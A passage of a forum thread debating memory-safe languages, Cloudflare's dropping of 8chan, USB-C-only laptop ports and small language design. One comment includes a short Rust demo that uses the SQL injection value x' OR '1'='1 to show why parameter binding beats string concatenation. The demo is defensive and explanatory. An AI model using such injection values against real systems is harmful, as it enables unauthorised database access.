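}
```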
                                                                                                      2. 0

                                                                                                        Of course older software, mostly written in memory-unsafe languages, sometimes written in a time when not every device was connected to a network, contains more known memory vulnerabilities. Especially when it’s maintained and audited by companies with excellent security teams.

                                                                                                        These statistics don’t say much at all about the overall state of our software landscape. It doesn’t say anything about the relative quality of memory-unsafe codebases versus memory-safe codebases. It also doesn’t say anything about the relative sizes of memory-safe and memory-unsafe codebases on the internet.

                                                                                                        1. 10

                                                                                                          iOS and Android aren’t “older software”. They’ve been born to be networked, and supposedly secure, from the start.

                                                                                                          Memory-safe codebases have 0% memory-unsafety vulnerabilities, so that is easily comparable. For example, check out the CVE database. Even within one project — Android — you can easily see whether the C or the Java layers are responsible for the vulnerabilities (spoiler: it’s C, by far). There’s a ton of data on all of this.

                                                                                                          1. 2

                                                                                                            Android is largely cobbled together from older software, as is iOS. I think Android still needs a Fortran compiler to build some dependencies.

                                                                                                            1. 9

                                                                                                              That starts to look like a No True Scotsman. When real-world C codebases have vulnerabilities, they’re somehow not proper C codebases. Even when they’re part of flagship products of top software companies.

                                                                                                              1. 2

                                                                                                                I’m actually not arguing that good programmers are able to write memory-safe code in unsafe languages. I’m arguing vulnerabilities happen at all levels in programming, and that, while memory safety bugs are terrible, there are common classes of bugs in more widely used (and more importantly, more widely deployed languages), that make it just one class of bugs out of many.

                                                                                                                When XSS attacks became common, we didn’t implore VPs to abandon Javascript.

                                                                                                                We’d have reached some sort of conclusion earlier if you’d argued with the point I was making rather than with the point you wanted me to make.

                                                                                                                1. 4

                                                                                                                  When XSS attacks became common, we didn’t implore VPs to abandon Javascript.

                                                                                                                  Actually, we did. Sites/companies that solved XSS did so by banning generation of markup “by hand” and instead mandating use of safe-by-default template engines (e.g. JSX). Same with SQL injection: years of saying “be careful, remember to escape” didn’t work, and “always use prepared statements” worked.

                                                                                                                  These classes of bugs are prevalent only where developers think they’re not a problem (e.g. they’ve been always writing pure PHP, and will continue to write pure PHP forever, because there’s nothing wrong with it, apart from the XSS and SQLi, which are a force of nature and can’t be avoided).
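                                                                                                                  A toy sketch of that distinction (no real database driver here; the function names are made up): with string concatenation, attacker input can rewrite the query itself, while the prepared-statement pattern keeps the SQL text fixed and ships the input separately as data.

```rust
// Vulnerable pattern: input is spliced into the SQL text itself.
fn concat_query(name: &str) -> String {
    format!("SELECT * FROM users WHERE name = '{}'", name)
}

// Prepared-statement pattern: the SQL text is constant; the driver
// would send the parameter out-of-band, so it can never alter the query.
fn bound_query(name: &str) -> (String, Vec<String>) {
    (
        "SELECT * FROM users WHERE name = ?".to_string(),
        vec![name.to_string()],
    )
}

fn main() {
    let evil = "x' OR '1'='1";
    // Concatenation lets the payload rewrite the WHERE clause:
    assert!(concat_query(evil).contains("OR '1'='1"));
    // Binding keeps the query text constant, payload stays data:
    let (sql, params) = bound_query(evil);
    assert_eq!(sql, "SELECT * FROM users WHERE name = ?");
    assert_eq!(params[0], evil);
}
```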

                                                                                                                  1. 1

                                                                                                                    This kind of makes me think of someone hearing others talk about trying to lower the murder rate and then hysterically going into a rant about how murder is only one class of crime.

                                                                                                                    1. -1

                                                                                                                      I think a better analogy is campaigning aggressively to ban automatic rifles when the vast majority of murders are committed using handguns.

                                                                                                                      Yes, automatic rifles are terrible. But pointing them out as the main culprit behind the high murder rate is also incorrect.

                                                                                                                      1. 4

                                                                                                                        That analogy is really terrible and absolutely not fitting the context here. It’s also very skewed, the murder rate is not the reason for calls for bans.

                                                                                                                  2. 2

                                                                                                                    Although I mostly agree, I’ll note Android was originally built by a small business acquired by Google that continued to work on it probably with extra resources from Google. That makes me picture a move fast and break things kind of operation that was probably throwing pre-existing stuff together with their own as quickly as possible to get the job done (aka working phones, market share).

                                                                                                                2. 0

                                                                                                                  Yes, if you zoom in on code bases written in memory-unsafe languages, you unsurprisingly get a large number of memory-unsafety vulnerabilities.

                                                                                                                  1. 12

                                                                                                                    And that’s exactly what illustrates “eliminates a class of bugs”. We’re not saying that we’ll end up in utopia. We just don’t need that class of bugs anymore.

                                                                                                                    1. 1

                                                                                                                      Correct, but the author is arguing that this is an exceptionally grievous class of security bugs, and (in another article) that developers’ judgement should not be trusted on this matter.

                                                                                                                      Today, the vast majority of new code is written for a platform where execution of untrusted memory-safe code is a core feature, and the safety of that platform relies on a stack of sandboxes written mostly in C++ (browser) and Objective C/C++/C (system libraries and kernel)

                                                                                                                      Replacing that stack completely is going to be a multi-decade effort, and the biggest players in the industry are just starting to dip their toes in memory-safe languages.

                                                                                                                      What purpose does it serve to talk about this problem as if it were an urgent crisis?

                                                                                                                      1. 11

                                                                                                                        Replacing that stack completely is going to be a multi-decade effort, and the biggest players in the industry are just starting to dip their toes in memory-safe languages.

                                                                                                                        Hm, so. Apple has developed Swift, which is generally considered a systems programming language, to replace Objective-C, which was their main programming language and already had safety features like baked-in ARC. Google has implemented Go, and Mozilla Rust. Google uses tons of Rust in Fuchsia and has recently imported the Rust compiler into the Android source tree.

                                                                                                                        Microsoft has recently been blogging about Rust quite a lot, is often seen hanging around the community, and has written about how severe memory problems are for its security story. Before that, Microsoft spent tons of engineering effort on Haskell as a research base and on C#/.NET as a replacement for its C/C++ APIs.

                                                                                                                        Amazon has implemented firecracker in Rust and bragged about it on their AWS keynote.

                                                                                                                        Come again about “dipping toes”? Yes, there’s huge amounts of stack around, but there’s also huge amounts to be written!

                                                                                                                        What purpose does it serve to talk about this problem as if it were an urgent crisis?

                                                                                                                        Because it’s always been a crisis and now we have the tech to fix it.

                                                                                                                        P.S.: In case this felt a bit like bragging Rust over the others: it’s just where I’m most aware of things happening. Go and Swift are doing fine, I just don’t follow as much.

                                                                                                                        1. 2

                                                                                                                          The same argument was made for Java, which on top of its memory safety, was presented as a pry bar against the nearly complete market dominance of the Wintel platform at the time. Java evangelism managed to convert new programmers - and universities - to Java, but not the entire world.

                                                                                                                          Oracle’s deadly embrace of Java didn’t move it to rewrite its main cash cow in Java.

                                                                                                                          Rust evangelists should ask themselves why.

                                                                                                                          I think that of all the memory-safe languages, Microsoft’s C++/CLI effort comes closest to understanding what needs to be done to entice coders to move their software into a memory-safe environment.

                                                                                                                          At my day job, I actually try to spend my discretionary time trying to move our existing codebase to a memory-safe language. It’s mostly about moving the pieces into place so that green-field software can seamlessly communicate with our existing infrastructure. Then seeing what parts of our networking code can be replaced, slowly reinforcing the outer layers while the inner core remains memory unsafe.

                                                                                                                          Delicate stuff, not something you want the VP of Engineering to issue edicts about. In the meantime, I’m still a C++ programmer, and I really don’t appreciate this kind of article painting a big target on my back.

                                                                                                                          1. 4

                                                                                                                            Java and Rust are vastly different ball parks for what you describe. And yet, Java is used successfully in the database world, so it is definitely to be considered. The whole search engine database world is full of Java stacks.

                                                                                                                            Oracle didn’t rewrite its cashcow, because - yes, they are risk-averse and that’s reasonable. That’s no statement on the tech they write it in. But they did write tons of Java stacks around Oracle DB.

                                                                                                                            It’s an argument on the level of “Why isn’t everything at Google Go now?” or “Why isn’t Apple using Swift for everything?”.

                                                                                                                            1. 2

                                                                                                                              Looking at https://news.ycombinator.com/item?id=18442941 it seems that it was too late for a rewrite when Java matured.

                                                                                                                          2. 8

                                                                                                                            What purpose does it serve to talk about this problem as if it were an urgent crisis?

                                                                                                                            To start the multi-decade effort now, and not spend more decades just saying that buffer overflows are fine, or that, despite 40 years of evidence to the contrary, programmers can just avoid causing them.

                                                                                                                3. 9

                                                                                                                  I didn’t see this kind of zeal when (for example) PHP software fell prey to SQL injections left and right

                                                                                                                  You didn’t? SQL injections are still #1 in the OWASP top 10. PHP had to retrain an entire generation of engineers to use mysql_real_escape_string over vulnerable alternatives. I could go on…

                                                                                                                  I think we have internalized the SQL injection arguments but have still not accepted the memory safety arguments.

                                                                                                                  1. 3

                                                                                                                    I remember arguments being presented to other programmers. This article (and another one I remembered, which, as it turns out, is written by the same author: https://www.vice.com/en_us/article/a3mgxb/the-internet-has-a-huge-cc-problem-and-developers-dont-want-to-deal-with-it ) explicitly target the layperson.

                                                                                                                    The articles use the language of whistleblowers. It suggests that counter-arguments are made in bad faith, that developers are trying to hide this ‘dirty secret’. Consider that C/C++ programmers skew older, have less rosy employment prospects, and that this article feeds nicely into the ageist prejudices already present in our industry.

                                                                                                                    Arguments aimed at programmers, like this one at least acknowledge the counter-arguments, and frame the discussion as one of industry maturity, which I think is correct.

                                                                                                                    1. 2

                                                                                                                      I do not see it as bad faith. There are a non-zero number of people who say they can write memory safe C++ despite there being a massive amount of evidence that even the best programmers get tripped up by UB and threads.

                                                                                                                      1. 1

                                                                                                                        Consider that C/C++ programmers skew older, have less rosy employment prospects, and that this article feeds nicely into the ageist prejudices already present in our industry.

                                                                                                                        There’s an argument to be made that the resurging interest in systems programming languages through Rust, Swift and Go futureproofs experience in those areas.

                                                                                                                    2. 5

                                                                                                                      Memory safety advocate here. It is the most pressing issue because it invokes undefined behavior. At that point, your program is entirely meaningless and might do anything. Security issues can still be introduced without memory unsafety of course, but you can at least reason about them, determine the scope of impact, etc.

                                                                                                                    1. 13

                                                                                                                      It’s not censorship if it’s a private service, revoking service. It’s reasonable for Cloudflare to decide who it does and doesn’t want as customers.

                                                                                                                      What’s not reasonable is for Cloudflare to become a fundamental gatekeeper to infrastructure. As long as 8chan aren’t dependent upon Cloudflare to be able to operate, it’s not a problem. The moment they are, it is.

                                                                                                                      1. 10

                                                                                                                        What’s not reasonable is for Cloudflare to become a fundamental gatekeeper to infrastructure. As long as 8chan aren’t dependent upon Cloudflare to be able to operate, it’s not a problem. The moment they are, it is.

                                                                                                                        They aren’t. There’s multiple other options, including building a CDN yourself.

                                                                                                                        1. 3

                                                                                                          It’s not that one needs a CDN to provide a website, however much the CDN providers want you to believe that, but including building a CDN yourself as a realistic[1] option is laughable.

                                                                                                                          [1] Yes, I know, you didn’t use that word.

                                                                                                                          1. 4

                                                                                                                            I don’t agree that building a CDN setup yourself isn’t feasible. It’s been done before CloudFlare was on the market. As an example, major FOSS projects do binary distribution, self-built on volunteer time.

                                                                                                                            It’s just expensive compared to just buying CFs services.

                                                                                                                            1. 2

                                                                                                                              Website in general: yes, you can build without a CDN.

                                                                                                              Imageboards serve a lot of images (it’s in their name), which uses a lot of bandwidth. You really need a CDN for even a medium-sized imageboard. 8chan is an imageboard.

                                                                                                                              1. 4

                                                                                                                Imageboards serve a lot of images (it’s in their name), which uses a lot of bandwidth. You really need a CDN for even a medium-sized imageboard. 8chan is an imageboard.

                                                                                                                Yes, you really need a CDN. But images are also relatively easy to distribute and extremely disk-cache friendly. You can build a special-cased CDN for an imageboard. I don’t want to say it is cheap, or as high-quality, or that it can just be done on the side, but it is a relatively well-understood problem.

                                                                                                                                (I used to build image and video-CDN, FWIW)

                                                                                                                                1. 2

                                                                                                                  Yes, but there are still price problems, and 8chan would rather not have those. Also, they probably want DDoS protection, as they host controversial content, and building your own CDN to handle DDoS attacks adds even more cost. Needing to build your own CDN is not exactly a nice problem to have; you’d rather just use somebody else’s CDN.

                                                                                                                                  1. 4

                                                                                                                                    If 8chan’s business model is only cost effective because they are subsidized by CloudFlare that’s a problem with 8chan’s business model, not CloudFlare.

                                                                                                                                    Although I guess it is kind of a problem with CloudFlare as well.

                                                                                                                                    1. 3

                                                                                                                      There’s no moral right to have every cheap option available to you unless you are a protected class, just as there is no moral right to your business model.

                                                                                                                                      1. 2

                                                                                                                                        Freedom of speech means the government can’t interfere with speech, not that uttering that speech should be as cost-effective as possible.

                                                                                                                                        1. -1

                                                                                                                          Yes, but if there were a $1,000 tax on anything that you want to say publicly, it wouldn’t be free speech, would it?

                                                                                                                                          1. 4

                                                                                                                                            This is a non-sequitur. No such tax exists and if it did in a country with freedom of expression, it would be rightfully challenged in court.

                                                                                                                                            Before the internet, if you wanted to get your views out there, you had to pay to publish a newspaper, or a pamphlet, or a book. There was no expectation that you could do this for free.

                                                                                                                            1. 6

                                                                                                                              Ports. The t480s has 2 USB-A ports and 2 USB-C ports. It also has a full size HDMI, SD card slot, and full-size Ethernet. Is 0.14” difference in thinness worth access to the ports, user upgrade-ability, and the longevity of the keyboard?

                                                                                                                              Given that there are quite a few usb-c hubs[1], or single-use-case (eg. hdmi for presentations) dongles, out there that offer the ports in a breakout/hub/dongle format, I don’t desire a return of all the ports that I use so occasionally/seldom. Paying the size/thickness/weight tax all the time for something I use rarely isn’t a great tradeoff for me.

                                                                                                                              Then again, I use a laptop to be mobile, not as a desktop replacement. I realize that not everyone does this, so ymmv.

                                                                                                                              [1]: Kingston’s Nucleum has two USB 3.0 ports, an HDMI port, a SD and microSD card slot, one USB-C charging port and one regular USB-C port

                                                                                                                              1. 13

                                                                                                                                USB-C devices and hubs are pretty bad if you want to run more than one 4k60 display. Some can’t even do one. You can’t just plug in one hub and be done. I had to plug in three different USB-C dongles to get two 4k60 monitors, ethernet, keyboard, mouse, audio going on my 15” rMBP. Worse, USB-C slips and loses connectivity very easily.

                                                                                                                                The whole situation is asinine. Yes they’re meant to be mobile but I’m not paying $3k for something functionally equivalent to a netbook on steroids.

                                                                                                                                1. 6

                                                                                                                                  USB-C slips and loses connectivity very easily

                                                                                                                                  I missed this part earlier (or maybe you edited it in later). I very much agree with this one. I find usb-c a bit fiddlier than I would like, especially for power in comparison to the old apple magnetic (magsafe) power connectors. RIP magsafe.

                                                                                                                                  1. 2

                                                                                                                                    Multiple 4k60 displays seems a bit like a job for a desktop to me. That said, I agree that that sucks. I wonder if it is a limitation of usb-c, or if so few people have that use-case that nobody makes a hub that can do it yet.

                                                                                                                                    EDIT: hmm. looks like a displayport 1.2 limitation, based on some searching. DP 1.2 supports a single 4K 60 Hz monitor, two 1440p 60 monitors, and so on. DP 1.3 supports more (gfx card willing), but I think usb-c/thunderbolt3 is still DP1.2. bummer.
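The DP 1.2 limit described above is easy to sanity-check with back-of-the-envelope arithmetic. A rough sketch (payload bits only; real link budgets also include blanking intervals, so these figures are lower bounds on what each mode needs; 17.28 Gbit/s is HBR2’s effective four-lane rate after 8b/10b coding):

```java
// Back-of-the-envelope DisplayPort bandwidth check (payload only).
public class DpBandwidth {
    // DP 1.2 / HBR2 effective data rate after 8b/10b coding, in Gbit/s.
    static final double DP12_GBITS = 17.28;

    // Uncompressed payload rate for a given mode, in Gbit/s.
    static double gbits(int width, int height, int hz, int bitsPerPixel) {
        return (double) width * height * hz * bitsPerPixel / 1e9;
    }

    public static void main(String[] args) {
        double one4k60  = gbits(3840, 2160, 60, 24); // ~11.9 Gbit/s
        double one1440p = gbits(2560, 1440, 60, 24); // ~5.3 Gbit/s
        System.out.printf("one 4k60 fits:   %b%n", one4k60 < DP12_GBITS);
        System.out.printf("two 4k60 fit:    %b%n", 2 * one4k60 < DP12_GBITS);
        System.out.printf("two 1440p60 fit: %b%n", 2 * one1440p < DP12_GBITS);
    }
}
```

which matches the comment above: one 4k60 or two 1440p60 streams fit in a DP 1.2 link, but two 4k60 streams (~23.9 Gbit/s) do not.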

                                                                                                                                    1. 5

                                                                                                                                      It’s a MacBook Pro. I was running 2 displays off a 12” Thinkpad with the dock years and years ago.

                                                                                                                                      1. 4

                                                                                                                                        And you can still do so if those displays aren’t 4k. The terrible industry-wide state of getting pixels from RAM to screen is not Apple’s doing, and any attempt they make to fix it themselves will be met with endless pearl-clutching about “proprietary connections.”

                                                                                                                                        1. 2

                                                                                                                                          I don’t mind how they fix it; I would prefer more port types than just USB-C. I think the decision to only have USB-C is aesthetic, not functional.

                                                                                                                                          1. 3

                                                                                                                                            There are functional reasons to want only one port on your device. However, their decision to go about it in classic Apple fashion, making the change out of nowhere, was certainly a head-scratcher.

                                                                                                                                        2. 4

                                                                                                                                          A MBP will absolutely run multiple 4K displays on a single port.

                                                                                                                                          Fuck, a Mac mini with just Intel graphics will run 2 4K displays, also from a single port.

                                                                                                                                          1. 2

                                                                                                                                            I get that it has Pro in the name. Did you use docking at every location where you worked with multiple monitors? Monitors these days also just seem huge to me. I can’t imagine someone having two 30+ inch 4k monitors on their desk ( that’s a /lot/ of terminals! ;) ) and yet choosing to drive it with a laptop. The workflow comparison between that and running undocked seems significant.

                                                                                                                                            I do wonder if some portion of people get laptops just because, or on the off chance that they might do something on the go, but then they end up using them docked 100% of the time anyway. Definitely not saying this was you though, as I have no clue how you worked or used your machines.

                                                                                                                                            1. 5

                                                                                                                              Some people don’t buy laptops, but their company only provides laptops. You have to be able to use the laptop as a desktop replacement if you need/want to. Heck, desktops are a vanishing breed; I imagine 90% of them are sold as gaming machines these days.

                                                                                                                                              1. 2

                                                                                                                                                Chiming in with an anecdote, but I will emphasize this is my singular experience and preference.

                                                                                                                                I have a 2015-era Thinkpad X1 Carbon whose built-in display is 1440p. For most of my programming use, I have it docked to an additional 1440p display, sometimes two, and turn off the built-in screen in favor of the two full-sized monitors. In both cases they are only 25” displays, but the additional pixels are very appreciated. I don’t really see myself upgrading those to 4K screens, but I can imagine others who might.

                                                                                                                                Some non-programming tasks also benefit greatly from the extra screen real-estate. I will sometimes design in Figma (full screen on one monitor) with the second monitor hosting two windows: an editor window for referencing existing CSS in our projects, and a browser open to the spec for the project whose design I am working on.

                                                                                                                                I am very much in the “laptop for the off chance they might do something on the go” crowd, but those times are far from insignificant. A lot of it is on-the-go comms with my team, and doing project-management and product-management tasks. I definitely would not be effective with only a desktop, i.e. with just a phone for on-the-go productivity.

                                                                                                                                          2. 0

                                                                                                                                            Limiting yourself to a USB-C (protocol) dock/device when you have TB3 ports but clearly want a not-average-joe functionality makes no sense to me.

                                                                                                                                          3. 3

                                                                                                                                            For me, this (multiple do-almost-anything ports, vs several each do-1-specific-thing ports) is the killer thing, but it works specifically for Macs because those ports are all TB3 not “just” USB-C.

                                                                                                                                            For basic things (i.e. the common complaint about the pre-TB3 MBP having “USB-A, HDMI and SD card” you can get a single USB-C ‘hub’ to provide all those ports, but whenever possible (and particularly for stuff relating to displays) I actually tend to get/suggest TB3 devices.

                                                                                                                                            1. 2

                                                                                                                              My question — and the question of most people I know who have a newer MacBook Pro — is: why not both? Why not have USB-C ports and HDMI? TB3 is awesome, but it doesn’t have to be exclusive.

                                                                                                                                              1. 4

                                                                                                                                It’s entirely possible Apple’s reasoning is aesthetic, but to me, a HDMI port is useless, and usually adding a HDMI port means you lose something else (see: the 2018 Mac mini that only supports 2x4k displays over TB3 because the third ‘supported’ display must be over HDMI).

                                                                                                                                                HDMI is also one of the least-hard “problems” to solve: you already need a HDMI cable, so use a different HDMI cable, with USB-C on one end.

                                                                                                                                                1. 2

                                                                                                                                  You’re right. The Mac mini is a really good example of a combination of ports that folks really enjoy having access to.

                                                                                                                                                  This is all a tangent though, the reality is Apple is bent on making their laptops like their tablets and I wish they wouldn’t. In the end though it’s all preference.

                                                                                                                                                  1. 3

                                                                                                                                                    reality is Apple is bent on making their laptops like their tablets

                                                                                                                                                    Maybe the reality as you see it, but until they add touch screens to their laptops, I’m going to remain pretty dubious about that viewpoint.

                                                                                                                                                    1. 2

                                                                                                                                                      You missed my point. Not sure if that was deliberate or not.

                                                                                                                                      The Mac mini has HDMI, for some reason, but because it does, you can’t run 3 DisplayPort 4K displays from it. You can run two over DP, and one has to be HDMI.

                                                                                                                                                      I would be happier if the mini had forgone HDMI for more TB3 ports (or even dedicated (mini) DisplayPort would be better than HDMI). I’d even give up the USB-A ports for more TB3 ports.

                                                                                                                                                      reality is Apple is bent on making their laptops like their tablets

                                                                                                                                                      I really cannot agree with that at all and I wonder if you somehow don’t understand that TB3 and USB-C are not the same thing.

                                                                                                                                                      1. 2

                                                                                                                                                        you can’t run 3 DisplayPort 4K displays […] I really cannot agree with that at all and I wonder if you somehow don’t understand that TB3 and USB-C are not the same thing.

                                                                                                                                                        Well, if we are going to be pedantic ;). If you use DisplayPort 4K displays, you are not using Thunderbolt 3, you are using the USB-C DisplayPort alternate mode. They are separate things, since there are also machines that have USB-C ports that support DisplayPort alt mode, but not Thunderbolt 3, such as the MacBook 12” [1].

                                                                                                                                                        So, why do you care about USB-C Thunderbolt 3 ports if you are going to hook up a DisplayPort display?

                                                                                                                                                        (BTW. it seems that Apple’s wording is intentionally muddy here for marketing purposes.)

                                                                                                                                                        [1] https://support.apple.com/en-us/HT206587

                                                                                                                                                        1. 1

                                                                                                                                                          I use a TB3 to dual DisplayPort adapter, so it only takes one port. I can guarantee you it is not using USB-C alt-mode.

                                                                                                                                                          1. 1

                                                                                                                                                            Now you are adding new data points. The default (and much cheaper) thing to do is to hook up a DisplayPort display directly to a Mac Mini or MacBook. Which is done using a regular passive DisplayPort <-> USB-C cable.

                                                                                                                                                            1. 1

                                                                                                                                                              No, I’m not.

                                                                                                                                                              You asked what’s wrong with a HDMI port. I told you: takes away video streams that would otherwise be available over DisplayPort.

                                                                                                                                                              Whether they’re routed over 3 USB-C to DP cables using Alt Mode, or via a TB3 adapter is irrelevant.

                                                                                                                                              Go look at any tech forum with people having issues with displays: for a decent chunk of them, it’s because they’re using HDMI. HDMI was literally designed for TVs and receivers; using it for computer displays is an afterthought, and it’s very apparent.

                                                                                                                                                              1. 1

                                                                                                                                                HDMI doesn’t “take away” video streams, Apple does. If Apple really wanted, they could’ve added the ability to use a 3rd video stream over USB-C, but they didn’t. There is really nothing stopping them, except maybe that the Intel chip may not have a 3rd DP output.

                                                                                                                                                                1. 1

                                                                                                                                                  The UHD 630 supports 3 displays over DP, HDMI, or eDP.

                                                                                                                                                  Apple chose to include HDMI, which means one of those outputs from the iGPU is used, or “taken away”, as a potential DP output over USB-C/TB3.

                                                                                                                                                    2. 1

                                                                                                                                      It’s entirely possible Apple’s reasoning is aesthetic, but to me, a HDMI port is useless, and usually adding a HDMI port means you lose something else (see: the 2018 Mac mini that only supports 2x4k displays over TB3 because the third ‘supported’ display must be over HDMI).

                                                                                                                                                      HDMI 2.0 supports 4k displays. The Mac Mini specs explicitly state that you can drive three 4k screens:

                                                                                                                                                      Up to three displays: Two displays with 4096-by-2304 resolution at 60Hz connected via Thunderbolt 3 plus one display with 4096-by-2160 resolution at 60Hz connected via HDMI 2.0

                                                                                                                                                      https://www.apple.com/mac-mini/specs/

                                                                                                                                                      1. 1

                                                                                                                                                        That’s what I said. It forces one display of the three to be hdmi, which IMO is garbage compared to DP. I’d rather have no HDMI and be able to drive 3 displays over TB3/DP

                                                                                                                                                        1. 1

                                                                                                                                                          Your comment was vague, it seemed to suggest that you cannot drive three 4k displays, but the point is that one of them has to be driven through HDMI. Fair enough.

                                                                                                                                          Apple’s rationale is very logical. Quite a few people use Mac minis as media centers. They’ll have a TV with HDMI connectors and HDMI cables. So Apple lowers the friction for a significant chunk of the audience, at the cost of the tiny subset that insists on driving three 4k displays through DP. I am not saying that it is not a legitimate use case, but it is a niche. Apple will probably tell you to buy a Mac Pro or something.

                                                                                                                                                          1. 1

                                                                                                                                                            What is vague about this:

                                                                                                                                                            the 2018 Mac mini that only supports 2x4k displays over TB3 because the third ‘supported’ display must be over HDMI

                                                                                                                                                            I would bet money Apple do not include HDMI on a Mac mini for those few people who still try to run a media centre on one. Apple’s “solution” (in terms of what they support feature wise and expect people would use) is AppleTV.

                                                                                                                                                            They provide HDMI because it’s designed as a “bring your own display” device and a bunch of cheap shit displays have HDMI input rather than DP.

                                                                                                                                                    3. 2

                                                                                                                                      Another reason is that the full-size HDMI connector is thicker than the side of the MacBook Pro. Mini and micro HDMI connectors could fit, but even then you’d need not-so-common adapters or special cables, so USB-C/TB3 is not a bad alternative.

                                                                                                                                                  2. 2

                                                                                                                                                    The t480s does have 2 USB-C ports for breaking out to more exotic ports but having a nice selection of ports is great.

                                                                                                                                                  1. 3

                                                                                                                                    What about a different approach: build as feature-complete a language as you can at the time, and when that’s done, only update the standard library. While the initial effort to learn the language will be high, there won’t be any need to re-learn the language, just to keep up with new standard library abstractions.

                                                                                                                                                    1. 7

                                                                                                                                                      For a programming language that followed something like this model, see Lua.

                                                                                                                                                    1. 3

                                                                                                                                      Not a great article. Your DSL problem sounds like a non-problem; all nontrivial programs function to some degree like a DSL. And I mean seriously: you can’t choose a Python module to function like net/http? Again, a real non-problem. Who cares when the tooling came around, as long as you have it?

                                                                                                                                                      Your “perfect language” is probably in the set {Python, Lua, Racket, Go}.

                                                                                                                                                      1. 14

                                                                                                                                                        I think it’s a really great article, it voices some things I wanted to write down, but couldn’t find the time.

                                                                                                                                                        A few things from my consideration on keeping languages small:

                                                                                                                                                        • Do not only consider the cost of adding a feature, but also the cost of removing it.
                                                                                                                                                        • If 10% of users would gain 20% more utility from a feature being added, that still means that the other 90% lose utility, because they still need to learn and understand the feature they didn’t ask for. It’s likely that the equation ends up being negative for most features if you account for that.
                                                                                                                                                        • Don’t focus at being great at something. Focus on not being bad at anything.
                                                                                                                                                        • Not every problem needs a (language-level) solution. If something is verbose, so be it.
                                                                                                                                                        • Allow people to save code by being expressive, not by adding short-cuts for every individual annoyance.
                                                                                                                                                        • Design things by writing the code you want your users to write. Then make that work.
                                                                                                                                                        • Have a way to deprecate, migrate, and remove language and library elements from day one.

                                                                                                                                                        And a few of the standard ones:

                                                                                                                                                        • Eliminate special-cases.
                                                                                                                                                        • Something that can be a library should never be a language feature.
                                                                                                                                                        • Make sure all features are orthogonal to each other.
                                                                                                                                        • The 80/20 rule doesn’t apply to language design.
                                                                                                                                                        • Make things correct first. Correct things are simple. Simple things are fast. – Focusing on “fast” first means sacrificing the other two.
                                                                                                                                                        1. 3

                                                                                                                                                          If 10% of users would gain 20% more utility from a feature being added, that still means that 90% lose utility. It’s likely that the equation ends up negative if you consider that those 90% still need to learn and understand the feature they didn’t ask for.

                                                                                                                                                          You don’t lose utility from a feature being added. That’s nonsensical.

                                                                                                                                                          1. 23

                                                                                                                                                            You don’t lose utility from a feature being added. That’s nonsensical.

                                                                                                                                                            You definitely can for some features. Imagine what would happen if you added the ability to malloc to Java, or the ability to mutate a data structure to Erlang.

                                                                                                                                                            But of course this doesn’t apply to most features.

                                                                                                                                                            1. 1

                                                                                                                                                              if you added the ability to malloc to Java

                                                                                                                                                              Java has that already? Various databases written in Java do allocate memory outside the GC heap. You can get at malloc via JNI, as well as using the direct ByteBuffers thing that they kinda encourage you to stick to for this.

                                                                                                                                                              1. 4

                                                                                                                                                                Java has that already?

                                                                                                                                                                Yes, and when it was added it was a huge mistake.

                                                                                                                                                                Everyone I know who uses the JVM won’t touch JNI with a ten-foot pole.

                                                                                                                                                              2. 1

                                                                                                                                                                I think it pretty much applies to all features.

                                                                                                                                                                For whatever utility you get out of a feature, you have to take into account that when users had to learn 50 features before to use the language, they now need to understand 51.

This issue is usually dismissed by those who propose new features (expert users), because they have already internalized the 50 existing features. Their effort is just “learn this single new thing”, because they know the rest already.

                                                                                                                                                                But for every new user, the total amount of stuff to learn just increased by 2%.

That doesn’t sound like much until you consider that – whatever language you use – 99.99% of people out there don’t know your language.

                                                                                                                                                                It’s hard to offset making things worse for 99.99% by adding a “single” great new feature for the 0.01%.

                                                                                                                                                                1. 2

                                                                                                                                                                  For whatever utility you get out of a feature, you have to take into account that when users had to learn 50 features before to use the language, they now need to understand 51.

                                                                                                                                                                  Yes, but this is a completely different category from “this language had an important feature, and by adding this new feature, we destroyed the old feature”.

                                                                                                                                                                  Adding mutability to Erlang doesn’t just make the language more complicated; it destroys the fundamental feature of “you can depend on a data structure being immutable”, which makes the language dramatically worse.

                                                                                                                                                                  1. 1

                                                                                                                                                                    but this is a completely different category

                                                                                                                                                                    Yes, but this is the category I had in mind when I wrote the list.

                                                                                                                                                                    The point the GP mentioned is above listed under “And a few of the standard ones”:

                                                                                                                                                                    Make sure all features are orthogonal to each other.

                                                                                                                                                              3. 7

                                                                                                                                                                Don’t just think about the code you write; think about the code you need to read that will be written by others. A feature that increases the potential for code to become harder to read may not be worth the benefit it provides when writing code.

                                                                                                                                                                1. 7

                                                                                                                                                                  C++ comes to mind. I think it was Ken Thompson who said it’s so big you only [need to] use a certain subset of it, but the problem is that everyone chooses a different subset. So it could be that you need to read someone else’s C++ but it looks like a completely different language. That’s no good!

                                                                                                                                                                  1. 7

                                                                                                                                                                    You don’t lose utility from a feature being added.

That’s nonsense. Consider the case of full continuations, as in Scheme: supporting them makes certain performance optimisations impossible, which makes all code (even code which doesn’t directly use them) run more slowly. Granted, this can be somewhat mitigated with a Sufficiently Smart Compiler™, but not completely.

                                                                                                                                                                    1. 4

                                                                                                                                                                      “Lose utility” is not the right framing. It’s more like increased cognitive overhead.

                                                                                                                                                                      1. 3

                                                                                                                                                                        You certainly pay a cost, though. That’s indisputable.

                                                                                                                                                                        1. 2

                                                                                                                                                                          Maybe “utility” is the wrong word for the thing you lose but you definitely lose something. And the amount of that thing you lose is a function of how non-orthogonal the new feature is to the rest of the language: the less well integrated the feature is, the worse your language as a whole becomes.

                                                                                                                                                                      2. 8

Thanks for the feedback. While I haven’t worked on any Common Lisp program large enough to have turned itself into a DSL, I also know that for any task, there are usually a few libraries, each of which covers no more than 80% of the use-cases for such a library. Whether this is caused by the language itself or its community, I don’t know, but I think it has more to do with the way that CL encourages building abstractions.

                                                                                                                                                                        As for the fact that Python doesn’t have a net/http equivalent in its standard library, I remember this being a somewhat major driver for Go’s adoption. You could build a simple website without having to choose any kind of framework at all. It was really easy to get something together quickly and test-drive the language, which is super important for getting people to use it. Also, having something that creates a shared base for “middleware” and frameworks on top of the standard library had to have led to better interoperability within the early Go web ecosystem.

                                                                                                                                                                        I will concede that good tooling shortly after launch is the least important point, but really spectacular tooling is a good enough selling point for me to use a language on its own, so I think it does matter, since it allows people to write larger programs without waiting so much for the language to mature.

It appears that I did a poor job of communicating that my list of points was geared towards new languages today (or ones of a similar age to Go), but I will absolutely play with Tcl and continue to investigate other existing options.

                                                                                                                                                                        1. 1

                                                                                                                                                                          As for the fact that Python doesn’t have a net/http equivalent in its standard library

